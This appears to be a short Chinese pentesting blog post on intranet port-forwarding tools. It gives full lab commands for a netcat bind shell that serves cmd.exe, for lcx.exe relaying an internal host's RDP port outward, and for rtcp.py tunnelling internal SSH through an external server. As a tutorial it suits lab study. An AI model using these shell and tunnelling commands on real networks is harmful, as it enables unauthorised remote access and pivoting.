内网端口转发工具

一、NC反弹

　　NC反弹我们通常用来反弹获取shell，其实也可以转发端口。

　　测试：

　　本机：win7　　IP：192.168.245.128

　　远程主机：xp　　IP：192.168.245.132

　　在远程主机输入命令：nc -l -p 8888 -t -e cmd.exe   

　　本地主机输入命令：nc -nvv 192.168.245.132 8888

　　

 

　

 

　　输入命令后我们可以看的本地主机获取了一个远程主机的shell，查看IPipconfig，IP为远程主机。

二、LCX.EXE

　　lcx.exe也是常用的端口转发工具

　　测试：

　　本机：win10　　IP：192.168.1.26

　　远程主机：win7　　IP：192.168.245.128

　　在远程主机输入命令：lcx.exe -slave 192.168.1.26 51 192.168.245.128 3389

 

 

　　#将内网主机的3389端口转发到本地主机51端口

　　在本机输入命令：lcx.exe -listen 51 3389

 

 

　　#将本机监听的51端口转发至3389端口

　　转发成功后，远程连接本机3389端口。

三、RTCP.PY

　　rtcp.py是一款Linux端口转发工具，是用python实现的一款开源工具

　　使用场景：

　　假设内网服务器：A，外网服务器：B

　　在外网服务器B运行：rtcp.py l:10001 l:10002

　　#表示监听本机10001和10002两个端口，是两个端口达到数据互传

　　在内网服务器A运行：rtcp.py c:lhost:22 c:rhost:10001

　　#连接内网22端口和外网服务器的10001端口

　　执行命令：ssh 外网服务器IP -p 10002访问内网服务器A的22端口。

 

工具不在多，在掌握即可，以上是博主比较习惯用的几款端口转发小工具，如果你们有更好的工具可以评论区发出来。